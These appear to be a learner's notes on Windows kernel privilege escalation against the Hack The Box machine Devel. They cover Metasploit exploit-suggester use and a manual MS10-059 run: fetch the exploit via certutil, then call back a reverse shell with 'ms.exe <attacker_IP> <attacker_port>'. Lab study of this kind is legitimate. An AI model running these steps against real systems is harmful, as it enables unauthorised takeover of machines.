55 lines
1.5 KiB
Markdown
55 lines
1.5 KiB
Markdown
|
|
## Overview
|
|
|
|
![[image.BPHLW1.png]]
|
|
![[image.O2EHW1.png]]
|
|
|
|
- The reason we need "system info" is because there are specific kernel exploits depending on the Windows build.
|
|
- If we own the Kernel, we own the system - that's what we are trying to do.
|
|
|
|
|
|
## Escalation with Metasploit (Example - Devel HTB)
|
|
|
|
1. Background the meterpreter session2. Search and use the exploit you found by priv suggester
|
|
![[image.BPVLW1.png]]
|
|
|
|
2. Search and use the exploit you found by priv suggester
|
|
![[image.GMWMW1.png]]
|
|
|
|
3. Set the appropriate meterpreter session (and the other options)
|
|
![[image.T59QW1.png]]
|
|
|
|
4. Run and get another meterpreter session!
|
|
![[image.ILWHW1.png]]
|
|
|
|
5. Be root
|
|
![[image.1GM9V1.png]]
|
|
|
|
|
|
## Manual Kernel Exploitation (Devel - HTB)
|
|
|
|
1. Search for the specific kernel exploit in Google
|
|
- ms10-015 doesn't work because we don't have GUI access
|
|
- so keep working through them & researching each one
|
|
- Rest of example is with MS10-059 (chimichurri exploit)
|
|
|
|
2. Downloaded the .exe to attacking machine
|
|
![[image.59C9V1.png]]
|
|
|
|
3. Set up Python HTTP server on attacking machine to host the file for victim to download
|
|
|
|
4. Go to temp folder (likely have write access here)
|
|
![[image.ZQL8V1.png]]
|
|
|
|
5. Download the file with certutil command (similar to wgeton Linux)
|
|
![[image.MLLGW1.png]]
|
|
|
|
6. Run the command with proper syntax (ms.exe <attacker_IP> <attacker_port>)
|
|
![[image.PR0HW1.png]]
|
|
|
|
7. On attacking machine, open another shell with the correct
|
|
port
|
|
![[image.EEODW1.png]]
|
|
|
|
8. Become root!
|
|
![[image.TYR6V1.png]] |